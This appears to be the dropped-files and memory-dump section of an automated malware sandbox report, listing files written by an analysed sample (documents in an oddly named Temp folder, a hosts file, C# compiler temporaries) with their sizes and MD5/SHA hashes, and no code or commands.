C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Documents\ConnectUse.pdf

Filesize
1.4MB

MD5
804dcdcbd0cd680066a5e7d08f650ffc

SHA1
397368502b531ec01c3be2d7bceea094a7301e31

SHA256
2eda1f58a888621aca2d4ea04faad71cb3d3c6f02b1066c84083c9487a06310d

SHA512
5b4d2412b62773ecd8bcc891562b495e6325c9860e18ca39c8777e2e89add8ad91d8dc91034d2cf89c3910c54537c8b8f1c31706b0d718299fca5fcebeec515e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Documents\InvokeTrace.xlsx

Filesize
725KB

MD5
e39b4c7a7f5319ca1d9a0cceca05d331

SHA1
6f2c1b6a7c8f871974c857cd910c528bfef1867a

SHA256
120d87fc82e96ac1ead22be44697d53b7cb867c561c43fe0867dcad9bbb4ad25

SHA512
21879592778f1d113e7225b6de8c80709e5bd339204d5019a34c0a5c81f35d87861fbf7561f3d9108bc5725e8dfbfa9550a9cf068c5956e2aff4c760127c9522

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Documents\SearchBackup.potx

Filesize
1.6MB

MD5
769ebe0ef8997f9c40e2536105a55609

SHA1
e965dee2e8a5f3f4ee3841bf87d135afd0a87c4b

SHA256
6dd1634286c1fc020206ab2ee84af19905ef09f403cef0dd468cbefe36f1115d

SHA512
4e4de1eec1338b8c7ed3f03ab8f0a4028ffacfc193aaa827491818e078c9cf24049536cafd28d39ed56d965bffd5708f57ca47471800dff41017aa5a384ac255

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Documents\SendOptimize.txt

Filesize
783KB

MD5
36506e836fcd409ee22b83bada9c6673

SHA1
598bddfbc2b1db1053f9c509128cfd4d80bf19eb

SHA256
5a2b98c07f1bb7bee00d19d1161fc718e345fa9476a8d8b120bfb57116bfb73f

SHA512
baa1056763490f15b3ccc4394820f054e45b0e7195e01b05353ca2b2a139f99b8973253d358ea91b8645b32c450085301470042144e146fab91b4d43c3cbb81e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Downloads\BlockSuspend.txt

Filesize
678KB

MD5
ed2012dd3a5dd3a34a9ceaaed2027bc1

SHA1
71bf1216878072bfad8951cd140813b01d5085e6

SHA256
fc81f024ebac270c5b7bdb7a549067f859f05f02ba43de8a9da4481798d95102

SHA512
41572ab34014abbd4f3995ba7043e97d7bb2d3166912c06b1fd713905419b263a16bb5b56164eaef11d8c7241f2d9dce648749f6d733f04ba6b4e0b1a92bc763

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Downloads\CompleteFormat.csv

Filesize
555KB

MD5
bbf748499773c4ace2da876cc8d9aac1

SHA1
b6e44345eb8ddb532862e73f474c13d80abf841c

SHA256
8a26e68439bd8b219d936cffe5a03d5bb375def8ac7161b57b868677d0652f48

SHA512
5c3dc94af65ffed77b61ec28a27f70e52aa8f0010984fb8a353a2e1f0ce7777cbcc166facbdcbb90ae5b4589f886137197f6bab4ca5642dd14cc413671d90198

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Downloads\ConvertFromUndo.doc

Filesize
699KB

MD5
891f9d38f24ff5c5e1065184fb589f50

SHA1
55f806014425d4318b4bbea1018c12925bad83da

SHA256
4297b39bb18caf88406c059325579a5f83f2a89d62ca4856bb25cf060326d259

SHA512
1b141e0df33a898547cf73c169f09ba27c0bdb3b08b58cd9289546453c06fd8966dd576a17b1c3d2838455286623f02fd58ea7b3b18d3def5fa94c61773611e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Downloads\ExitRestore.txt

Filesize
596KB

MD5
f0736e21a8c0120de95fdaaf0dcc3b3a

SHA1
232a7bf35b4bf31fa24909f67ed208ccf9153b41

SHA256
f956497af1d602336bc775bbf1057592f8de4c4a0203d27a9998c448e2eae61f

SHA512
176c53459ad2b462e8256e4bf66f1ce7992500d84699a4e63c51558e8243ac86a1612795f25b723816dac18d346e596225a7bf49d9abcd938851797ece4ee56e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ \Common Files\Downloads\FindPublish.mp3

Filesize
431KB

MD5
a8a102c24b35cbec7325b86c6a5502be

SHA1
a68d6599da89b81039c0bc6cccb7ab9acd7a8e5c

SHA256
e9f104e621173d5772bb7d01e38b97a00f922bee8e2a432993d060218d521d73

SHA512
0ad21b00ee7b60db2521cf8fa36fccf385eeb84f9633fbd896908c7f6d711e407321f9b8edc14f57227f2f61fde7e47f446c6832dfed883cbc28b1ab39eef319

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wv2n1alr\CSCF716876756DA4EF8A16CA09E72A644FC.TMP

Filesize
652B

MD5
a6605ec05820e876b7867c8bc615fd16

SHA1
d9096244d5a9006deeda5c8f4db44e50d8df9d71

SHA256
7a1c83199b346326b887e9e566d0df97d6943457fed047bf83c680fea7f19970

SHA512
5905a67757365ab9fbf39ceb9c70c9ba6b91b4dbe841712b4a7a20f492963ad1e0589da07c5ef25b029130eac653b5ce6fd2455850a8db58e505244c1bdae79f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wv2n1alr\wv2n1alr.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wv2n1alr\wv2n1alr.cmdline

Filesize
607B

MD5
5ea8107a2a0915e0a93466f35be00ab6

SHA1
1e2e3916ab7018c025049f13a4af6d5d9ed57a72

SHA256
9f84c150a34071c9a3e0f806f90f594216c4a74610e9d796d212cd085399c11f

SHA512
305e754a37a3864002974cb17d6c108aa5bb9c30113f1ef7487a2d7b90734a60ad210f417bd18b64c6b8611b609ff4a9ad22460ed76c2a00ae0d40037d3a9924

Download Submit
memory/3836-206-0x00007FFE630B0000-0x00007FFE63B71000-memory.dmp

Filesize
10.8MB

Download
memory/3836-126-0x000002C9743D0000-0x000002C9743F2000-memory.dmp

Filesize
136KB

Download
memory/3836-122-0x00007FFE630B0000-0x00007FFE63B71000-memory.dmp

Filesize
10.8MB

Download
memory/3836-114-0x00007FFE630B3000-0x00007FFE630B5000-memory.dmp

Filesize
8KB

Download
memory/3836-115-0x00007FFE630B0000-0x00007FFE63B71000-memory.dmp

Filesize
10.8MB

Download
memory/3908-238-0x00000212F1D00000-0x00000212F1D08000-memory.dmp

Filesize
32KB

Download
memory/4100-58-0x00007FFE77400000-0x00007FFE77424000-memory.dmp

Filesize
144KB

Download
memory/4100-71-0x00007FFE63E20000-0x00007FFE64342000-memory.dmp

Filesize
5.1MB

Download
memory/4100-69-0x00007FFE70450000-0x00007FFE70483000-memory.dmp

Filesize
204KB

Download
memory/4100-70-0x00007FFE63D50000-0x00007FFE63E1D000-memory.dmp

Filesize
820KB

Download
memory/4100-251-0x00007FFE63D50000-0x00007FFE63E1D000-memory.dmp

Filesize
820KB

Download
memory/4100-250-0x00007FFE70450000-0x00007FFE70483000-memory.dmp

Filesize
204KB

Download
memory/4100-252-0x00007FFE63E20000-0x00007FFE64342000-memory.dmp

Filesize
5.1MB

Download
memory/4100-64-0x00007FFE73B40000-0x00007FFE73B4D000-memory.dmp

Filesize
52KB

Download
memory/4100-62-0x00007FFE736B0000-0x00007FFE736C9000-memory.dmp

Filesize
100KB

Download
memory/4100-60-0x00007FFE64540000-0x00007FFE646B6000-memory.dmp

Filesize
1.5MB

Download
memory/4100-80-0x00007FFE63C30000-0x00007FFE63D4B000-memory.dmp

Filesize
1.1MB

Download
memory/4100-57-0x00007FFE776B0000-0x00007FFE776C9000-memory.dmp

Filesize
100KB

Download
memory/4100-54-0x00007FFE77A70000-0x00007FFE77A9D000-memory.dmp

Filesize
180KB

Download
memory/4100-30-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp

Filesize
148KB

Download
memory/4100-48-0x00007FFE7D530000-0x00007FFE7D53F000-memory.dmp

Filesize
60KB

Download
memory/4100-25-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp

Filesize
6.8MB

Download
memory/4100-79-0x00007FFE73A10000-0x00007FFE73A1D000-memory.dmp

Filesize
52KB

Download
memory/4100-78-0x00007FFE726D0000-0x00007FFE726E4000-memory.dmp

Filesize
80KB

Download
memory/4100-216-0x00007FFE64540000-0x00007FFE646B6000-memory.dmp

Filesize
1.5MB

Download
memory/4100-72-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp

Filesize
148KB

Download
memory/4100-204-0x00007FFE77400000-0x00007FFE77424000-memory.dmp

Filesize
144KB

Download
memory/4100-68-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp

Filesize
6.8MB

Download
memory/4100-271-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp

Filesize
6.8MB

Download
memory/4100-272-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp

Filesize
148KB

Download
memory/4100-306-0x00007FFE646C0000-0x00007FFE64D98000-memory.dmp

Filesize
6.8MB

Download
memory/4100-331-0x00007FFE63D50000-0x00007FFE63E1D000-memory.dmp

Filesize
820KB

Download
memory/4100-330-0x00007FFE70450000-0x00007FFE70483000-memory.dmp

Filesize
204KB

Download
memory/4100-329-0x00007FFE73B40000-0x00007FFE73B4D000-memory.dmp

Filesize
52KB

Download
memory/4100-328-0x00007FFE736B0000-0x00007FFE736C9000-memory.dmp

Filesize
100KB

Download
memory/4100-327-0x00007FFE64540000-0x00007FFE646B6000-memory.dmp

Filesize
1.5MB

Download
memory/4100-326-0x00007FFE77A70000-0x00007FFE77A9D000-memory.dmp

Filesize
180KB

Download
memory/4100-325-0x00007FFE776B0000-0x00007FFE776C9000-memory.dmp

Filesize
100KB

Download
memory/4100-324-0x00007FFE77400000-0x00007FFE77424000-memory.dmp

Filesize
144KB

Download
memory/4100-323-0x00007FFE7D530000-0x00007FFE7D53F000-memory.dmp

Filesize
60KB

Download
memory/4100-322-0x00007FFE79D80000-0x00007FFE79DA5000-memory.dmp

Filesize
148KB

Download
memory/4100-321-0x00007FFE63C30000-0x00007FFE63D4B000-memory.dmp

Filesize
1.1MB

Download
memory/4100-319-0x00007FFE73A10000-0x00007FFE73A1D000-memory.dmp

Filesize
52KB

Download
memory/4100-318-0x00007FFE726D0000-0x00007FFE726E4000-memory.dmp

Filesize
80KB

Download
memory/4100-316-0x00007FFE63E20000-0x00007FFE64342000-memory.dmp

Filesize
5.1MB

Download